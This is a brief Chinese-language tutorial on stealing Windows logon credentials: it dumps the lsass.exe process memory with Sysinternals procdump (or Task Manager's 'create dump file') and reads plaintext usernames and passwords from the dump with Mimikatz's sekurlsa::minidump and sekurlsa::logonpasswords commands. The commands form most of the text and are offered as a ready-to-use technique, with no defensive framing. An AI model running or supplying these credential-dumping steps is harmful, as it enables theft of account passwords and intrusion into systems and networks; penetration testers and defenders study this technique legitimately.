思路:
就是通過系統自帶的procdump去下載存儲用戶名密碼的文件(應該不能那么說這個文件,但是這樣理解沒問題),然后用獼猴桃讀取。
procdump.exe
Procdump是一個輕量級的Sysinternal團隊開發的命令行工具, 它的主要目的是監控應用程序的CPU異常動向, 並在此異常時生成crash dump文件, 供研發人員和管理員確定問題發生的原因. 你還可以把它作為生成dump的工具使用在其他的腳本中.
procdump下載地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
下載dmp命令:
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
會提示保存的地址,然后放到獼猴桃下面
然后使用獼猴桃(Mimikatz)進行讀取
讀取命令:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
「廢話」
關於dmp的導出也可以是這樣的:
1.對於NT6可以使用windows自帶的功能進行dump:
任務管理器—進程—顯示所有用戶進程—找到lsass—右鍵“創建轉儲文件”
